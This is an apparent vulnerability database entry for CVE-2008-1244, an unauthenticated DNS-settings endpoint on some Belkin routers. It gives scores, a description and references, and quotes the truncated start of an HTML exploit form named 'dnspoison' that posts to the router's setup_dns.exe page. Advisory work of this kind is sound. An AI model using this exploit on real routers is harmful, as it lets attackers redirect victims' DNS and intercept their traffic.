Published: 10/03/2008 Updated: 11/10/2018

CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10

VMScore: 1000

Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

cgi-bin/setup_dns.exe on the Belkin F5D7230-4 router with firmware 9.01.10 does not require authentication, which allows remote malicious users to perform administrative actions, as demonstrated by changing a DNS server via the dns1_1, dns1_2, dns1_3, and dns1_4 parameters. NOTE: it was later reported that F5D7632-4V6 with firmware 6.01.08 is also affected.

Vulnerable Product	Search on Vulmon	Subscribe to Product
belkin f5d7230-4

<html> <head> </head> <body> <b>html code to bypass the webinterface password protection of the Belkin wireless G router + adsl2 modem<br> It worked on model F5D7632-4V6 with upgraded firmware 60108</b> <br> <form action="19216821/cgi-bin/setup_dnsexe" name=dnspoison method=post&gt ...

CWE-287 http://www.gnucitizen.org/projects/router-hacking-challenge/https://bugzilla.mozilla.org/show_bug.cgi?id=371598 http://www.securityfocus.com/bid/28319 http://secunia.com/advisories/29345 https://exchange.xforce.ibmcloud.com/vulnerabilities/41124 http://www.securityfocus.com/archive/1/489009/100/0/threaded https://nvd.nist.gov https://www.exploit-db.com/exploits/6305/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2008-1244

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect